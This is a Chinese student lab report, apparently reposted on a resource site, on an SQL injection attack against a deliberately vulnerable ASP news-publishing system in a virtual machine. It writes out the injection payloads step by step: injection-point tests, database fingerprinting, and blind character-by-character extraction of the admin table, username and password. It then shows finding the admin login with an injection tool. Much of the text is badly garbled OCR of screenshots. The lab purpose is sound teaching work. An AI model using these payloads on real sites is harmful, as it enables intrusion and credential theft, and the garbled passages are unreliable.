SQL注入攻击实验报告剖析:sql注入原理
时间:2020-07-29 00:45:46 来源:天一资源网 本文已影响 人
-1 -
-1 -
实验报告
(实验名称 : SQL 注入攻击)
、实验目的通过SQL注入攻击,掌握网站的工作机制,认识到 SQL注入攻击的防范措施, 加强对Web攻击的防范。
二、 实验环境
描述实验开展所基于的网络环境,给出网络拓扑、 IP地址、web服务器、客户
机等信息。
宿主机(客户机):操作系统为 Windows 10,IP为1 ,在主机上安 装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行 网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信, 虚拟机(Web服务器):操作系统为 Windows XP,IP为, 本实验利用 windows的iis服务搭建了一个有 SQL注入漏洞的网站“ ASP新 闻发 布系统”,以该网站为目标,对其实施 SQL注入攻击。
本实验所需工具如下:
IIS是In ternet In formation Server的缩写,是微软提供的In ternet服务器软 件, 包括 Web FTP、Mail等服务器,也是目前常用的服务器软件。版本不限。
“啊D”注入工具:对“MSSQL显错模式”、“MSSQL不显错模式”、“Access’ 等数据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理 入口检测”、
“目录查看”等等于一身的注入工具包。
“ASP新闻发布系统” 0k3w v4.6源码。
三、 实验内容
(一)配置实验环境,
首先选择网络适配器,安装环回适配器,在主机上安装 VmwarePlayer,成功启
动虚拟机。接着配置宿主机和虚拟机的IP,如图.
要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge
姐果网笔恙持炯能 则可以乘取至动指派彩IP设気 否见「悔需妾认网 帝至跆谨男社衣舄适刍的IP设冒*
c信埶获得IP把址(6
@>使用下面的IP地址〔勺:
IP W(l)!
子网掩码M);
野迖尿去Q〕:
Iirteinpl 协说(TCP/IP)展性 ?|区
常规
辟劭議礬輪豔躡鬣勰睥蚩设品飙'
然后,验证宿主机和虚拟机是否联通,结果显示连接成功
程序,打开浏览器,输入地址“ ”,检查网IIS最后在虚拟机上安装站 搭建情况。-2 -
网需 身份強证艾享
洼接时星手:
亍 VMware Virtual Ethernet Adapter for VMnet8-
SSfC),..
1丈圭螢更弔下列瓊目Q:
回 Microsoft
"pVMw are Bridgie Protocol
<>安逋皿“smj〕厘性(Rj
<
>
安逋皿“
smj〕
厘性(Rj
JL铉蹈层拓扑发现响应程手
x InterstMidfeT 4 fTCP/IH4)
x Microsoft解S适配時蹌传送謎曲
A巻路层朽扑发現映肘器I/O驱动程韦
?Microsoft LLDP 硼皱曲稈闻
llicrosof t Windows [HS^ W. 0? 10586] Cc) 2015 licrosoft Corporation^ 編留所有权利?
C; \ VINDO1? S \ sy s t em3 2 >hdwwi z
L ■ \ Ilf『K^F"I广"lli ( U \ Lirr TLi 4- bhTTk'O O Tl Wb JT 1 G O H U G 1 O 1 1
成功!
(二)寻找注入点
,可以正常打开在宿主机上,打开网页 /list.asp?id=95
,可以正常打开
正在Ping 192. 168. 18. 11具有32字节的数据:
来自 192, 168. 12. 11 的回复:字节€2 时[5J<lins TTL=123 来百192, 168. 18. 11生回复:字节二置 时间丿丘口 HL=128 来百192. 168. 18. 11的回复:字节二置曲间匚Ins TTL = 12S 来自L92. 168. 18. 11的回复:字节切 时间Vims TTL=122
192, 168. 18. 11 的 Ping 统计信息:
数据包:已发送-4,已接收二L丢失二0 (0%丢失人 往返彳〒程的估计时间(叹毫秒为单位);
最短=Oms,最长=Oils,平均=0ms
C;MFINDOVS 扁 yst enBZ^ing 192. 168. 18.9
页面。正在Ping 192. 168. 18, 9具有32字节的数据: 来目L92. 168. 18.9的回复;字节匸亞 时祚3ms TTL=128
页面。
进行注入测试,键入 /list.asp?id=95 and 仁1 ,返回页
面不变。
-3 -
/list.asp?id=95 and 仁2 ,返回页面出错。键入
因此,可确定该网站存在注入点。
判断数据库类型 用系统表的方法进行判断,分别键入 from (select and
/list.asp?id=95 count(*)
sysobjects)>0
from
/list.asp?id=95 (select and
coun t(*)
msysobjects)>0
-4 -
U -ip - --p L. 【I启 Id iz i I
旳 「 WW里1側 聲 二芽慢换立磅屯樂
”若员人口 |瞥号1 ? ] SHi
r
则昴首向新H命叫
啤络安全
厲必制忏1
1榔u 1
屮曲帔计
越幅赏耳站忤:冋菇媒作號占篙省XPia-iE 11其功二址S■分用
<- O P* f@Ttt^9Z16&1M/lisUsp7ld=m2Qar>d%Wsel?t%20cwmCWOfrcm^QmsyHhK!=^ 住 -'竇Q Si?帧
O < ■■t^ KrilQJR-.Tr^l :T+E111SStv<) :t1 i 云法&rwT 无卞迂示国可
无法显示网页
tas询卿顾斗人渥,元刼乔?
出日轴方石刊料IT;
* 土小诅11卧呷"金乐
” KTff -L' -L'v-Ul...三市"辛.后豆睛關希E息帶蘇讲?
mi悄诧PW LOJ -芒#触旳话匸也*鈕苗逐
TrWr°r佶乏厉令
ferisfi〔司于宝曲心■
+卿癸
V- nr - ■flit J LI 3*t -hi - TnHri* (Crflri"'4n?¥lS
丁龍沁记K;虫「护毙二咗肖辽無Iffi应馆。
/likl.4k>r 忧 IE 厅
两者返回均出错,可知是access数据库。-5 -
猜测表名admi n中,我们先试一下,键入:一般网站后台的管理员都 默认在表 /list.asp?id=95 and (select count(*) from
adm in)v>0
合0 http//192,168,105/ i5t.asp?id = 959620arxj9fcM(select%20couitr>%?D"rc nV
合
无袪显示网灭
洁竽iH?ir u审ME:
admin的表。返回页面正常,可知该网站后台数据库中存在着表名为
admin
分别记但一般都有三个字段,(五)猜测字段名不同公司网站有不同的字段名, username, password。,录ID 号、用户名和密码,常用的字段名为:idfrom and (select cou nt(id) 键分别入 /list.asp?id=95
adm in)v>0
from (select cou nt(username) /list.asp?id=95 and
adm in)v>0
from coun t(password) and /list.asp?id=95 (select
adm in)v>0
*单击显阍观,莉肖启垂ii>
+扌一卄 主□?咗M三比三町岂信邑宀三旳罚言。
rtTTf铐漫500. ICO -阿.部紳帝渭谟-心F懾溪
Tnt?r?t信忌圖劳
(用于支特人员〉
*倉误益里:
Hicrc^D'ft TEI Engine (□:<6O04C?EO9)
押獗取曲:在「沖心血 上爰^谟取数翩I条 /list, tsp,第 e 冇
?娥署尝型:
ir?n 1.n fu:"』— mt ini rv unuj^j^ 山“-j■:鼻/eu了 g
(SiTML, Ide 4?k?) Cli-Mit/43.0. 2(523.^ Sifiri/Sl?. i6 SE
2 T W?t?Sr 1(1
-画:
GJH /list.右羽
?时间:
ZD1&U1Z月f巳J5取:阴
+住细倍慝: 忙?FOEdEt费特
password。
user name admin 三者返回均正常。 可知,表中存在的三个字段:
id ,,”的截图损坏,但是返回正常,望教员通融。注: “username
(六)猜测管理员用户名和密码 /list.asp?id=95 中有
几条记录,键入确定表1. admi n
and (select cou nt(*) from admi n)=1 返回页面正常。-6 -
admi n 只有一条记录。可知,表
/list.asp?id=95 and (select 2.猜测用户名长度,键入
续键入继回 len( user name) from adm in)=1 返出错,
/list.asp?id=95 and (select len(username) from
adm in)=2
3/4/5…,试续,出返回错继测
| ? htlf. /192.1CS.18.9 _:id?42G(ielrLtW2DLJLXjfiUid)96^0frcm%20dcJiiiiiC 心
□无;SS亍网
国十〕f D l计昔机网帘技术〉洋- '新礪讯卫%善爭尹
I M碌:,会员入口 祗号: |
I M碌:
V N 0 W
庖二暂闻衣堀采易力
| <3 68.18.9 : D1 ic - 5%2Qand%20(sdectM20c(]iJnt(pa5sword)%20fioni%20adr f 曲 '
止寻竝匸-左志显示网
◎ httpWl 9Z1 8.4/1 Istatp? ld=9 SK20iand%2(X^lKt%20count<l]^20f r&in%20admlnO=1 ,倉=
5。直到返回页面正确。测试到 5的时候,返回正常。可知,用户名长度为 位,用二分法,键入猜测用户名内容,采用 ASCII码分析法先猜测第1
3. /list.asp?id=95 and (select count(清誉i顽行F列新: 虽矣
清誉i顽行F列新:
虽矣Hll电汕詢r丟谄匕由1丸°
。a可知第一个字符为 依此类推,猜测之后的每一位字符,-8 -
9 //192.16S.1819/list.a5p?id=95%20and%20fe&lect^0 en(u&emame)^20^r
where
(asc(mid(username,1,1)))betwee n 30 and 125)<>0 返回正确,进一步缩小范
围。,,between 70 and 100 between 85 and 100 , between 90 and 100=97
收繭 6网茁导潮,r〒養席〒网
Q D (it为IO脸例设计) G蛀声I换細蛊傅傭1 <r0
无这显示网页
谊禺访2功直贞出H1I融"比去显下。
谄尝itKti阿城匸;
*卑击副新扌诩b瞬序洪
-抒开[晅辭上飞主页,鬆启查找与所需信割疲的铤新
MT7r佶谍500 100 -内訓轉鬻措罠-血绪谍
lLLtdt?L
'L O * ? ///1 i stasp? id= 959t20and%20(select^D len(ijS4mame)%20froi
■ 7
厶収辱舸网址导航D无囲瑟频
O D (吐x D Wt L 元第洞页 ;\ *
无袪■显示网页
■^宕 IV址寻氏 七击二L应6i.亡力自芒匚江.【i乐亠銅:J_蜀录
■^宕 IV址寻氏 七击二L应
6
i.亡力自芒匚江.【i乐亠
銅:
J_
蜀录
注期
F
內站百页
SfiM资讯|
|两络責全|
商页肃带|
|两站远首|
平閒设计
V K 0 W
ASF新间董布系掘赵&
2
2 Of p rn%2 0admln%20\^he re(a s<.(mi1;U5ema rri?r1J]))beriA een%20 909n20dnd^20l00)<>Cl V?
2
2 Of p rn%2 0admln%20\^he re(a s<.(mi1;U5ema rri?r1J]))beriA een%20 909n20dnd^20l00)<>Cl V?
(计耳机网睛按村灘
<7 h O W
壮P需i6J宣吊蒸编皿吕
r
网出肯页
1新同盗讯
1倒堵安全
网页制低用站运晉
平面设计
回堵细程滴示网站
nd^OGelect^^ountC^SOfrom^Oadmin^&SOwliere^sc^m dfuiemarrie 叮))注97)『、。
匕导萌匚元法灵示网
王册
U K O W
出P新闻衣齐糸统理E
凰站首页1
1新闻贯讯1
昭宾全1
屈页制忙
冏詰运莒
平面谡计1
削络细程1
潼示冏詰
:同码测4.猜密,理and
:同码测4.猜密,理and
(select /list.asp?id=95
len( password) from adm in)=6
-9 -
d?&SOfselect^Dcountf^SOfr om^O admin^G^fhvhere^scCrrbiaHu sc nanne, 2,2))) = 100) < >o|
卜寺益人匚悴:平钳:
卜寺益人匚
悴:
平钳:
汪册
I诂内齡:
网站百页I新闻资讯i网络安全丨刚页制作丨网站运肓 平向设计
位。所以密码为6
屠航
□无法
<计算电1网慈术》縈:
■ 'CU
? d
? d缩2。(seiect%2Ocourt(+)%20from?G2Oadmin%20讥here(Esc(mid;usernamer3r3;))- 1CQ]<>0| £
H^HiQ
H^HiQ 話曰谨刑科k虫* 冋帀P宿冋站忑运 谩廿 RL4W8 滝示科
? d
? d缩2。(seiect%2Ocourt(+)%20from?G2Oadmin%20讥here(Esc(mid;usernamer3r3;))- 1CQ]<>0| £
H^HiQ
H^HiQ 話曰谨刑科k虫* 冋帀P宿冋站忑运 谩廿 RL4W8 滝示科
d爲曹机网渚拽档廉 □ am咚农立变密一礙
,会员生] 脏昌:「 毎:
网姑首页 新闻资讯 朗绩安仝 囲页制柞 网曲运首I平面设计 朋络编趕 滝示网站
b会員入口 瞰号:
MF和“宣
MF和“宣H孫五E总
-10 -
Mwsn 新网遊刑岡彗冗土 marr 平百设计 wswe 常fh?站
印桃e抚keunt,)驾Mwn柯凶曲in%;Srf呻评MAK頼山:耳》呎畝$$彷?5!刃30 矣押笳触如丹^nta
矣押笳触如丹^nta那嗣哂舜血?n*“和admhi0讀,奋*
ram D薪红亍片
atf> C GHWW■郴翼 f D *
I ■ MAQ 杯 I HI: m ET1 II MWo
I C :
O;?F应k”]百” 匚科辭不 密: 4
?^1
-12 -
-12 -
-12 -
-12 -
~~V_=_V_JT
y 甘- 屬 ect ffluntrji hrtri m7p£ibfec±5.i Q 曲 曾富1 +.
m -近刼弼
['ph?叔口U K 0 W■f FH
['ph
?叔口
U K 0 W
■f FH里抚「廉专胡上
甲站EG 1$■夺M 畔占全 HIM制怅 HI曲医誉平西中计甲堵3耐玄示甲曲
嚅世切I西歯皿人诸邮
□ 'T r t .P ll
-11 -
■ 0 ? 4>l T
问冲cfiaXnntC曲Ofm畑旳組nEUQwhRn^i〕*]: ! <?■ 母mhB/UiTi? £ - 、■ Br vetmuniCr) ivnrrw^blvaU<Q 谢■ | * 9 & 生
■ft匚私晏〒耳
齢】 D <LtBWWw+) fli C|諛卫*<細 *
。6最终得到密码为位:123456
D”软件,点击进入“管理入口检测”选(七)寻找到后台管理窗口 打开“啊 项, 点击“检测管理入口”,进行检测,
0 .el ec(%?0oou n 1(*] %20from %20a d mi n%2Owh ere%?0%2 $c(mld (password^ 2D)=50) < > 0| * 曲-J |9
帥一|无氓后詡
i+)
二盘员△口 佔:登寻兰丑站内癖:
二盘员△口 佔:
登寻
兰丑
站内癖:
如图:打开检测到的各网址,测试是否为管理入口。为管理入口,如图:
/admi n/in dex.asp 可知,
(八)登陆后台 找到后台管理窗口, /admin/ad」ogin.asp
用刚刚得到的用户 名和密码登陆,后台登陆成功。 一
■ I EM附口HRiltWCTlDSAhin P就 IM IQ
■ I EM附口
HRiltWCTlDS
Ahin P就 IM IQ 9. 5ifiiLf
Xkhltji / J^ IM 10 別』Lfc/
亠h?r.|> .'/lIE If V 乩也《 all
^hlr> JK 1E£ BB 0 ■:kLhA込z wq:-
SL:£-
門
■臥g血
四、实验结果及分析
SQL注入攻击过程。
1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在
SQL 注入问题,如: /162414739931.shtml 就是普通的 网页访问。只有对数据库进行动态查询的业务才可能存在 SQL注入,如:
/list.asp?id=95 ,其中?id = 95表示数据库查询变量,这种语 句会在数据库中执行,因此可能会给数据库带来威胁。
2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过 输入一些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数 据库查询语句找到注入点。
3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度, 以及内容。这个过程可以通过网上大量注入工具快速实现,并借助破解网站轻易 破译用户密码。
4) 寻找WEB管理后台入口。通常 WEB后台管理的界面不面向普通用户开放, 要寻找至V后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依 次进行尝试,就可以试出管理台的入口地址。
5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进行破坏行为,如篡 改网页、上传木马、修改、泄漏用户信息等,并进一步入侵数据库服务器。
实验心得:
在实验的过程中遇到了很多困难, 配置上的,环境上的,还有一些需要注意的小 问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。
在整个实验中遇到的最大问题就是, 宿主机和虚拟机此前一直连不通, 通过宿主 机 ping 虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机 才能访问虚拟机上发布的网页。
可见,防火墙还是有一定作用的, 但是对于网站 来说开通 - 13 -
了防火墙就没办法访问网页了。
- 14 -
相关关键词: 实践,给教学注入新的活力 新鲜血液注入新活力 为基层党建注入新活力 注入新理念 为党内帮扶工作注入新的活力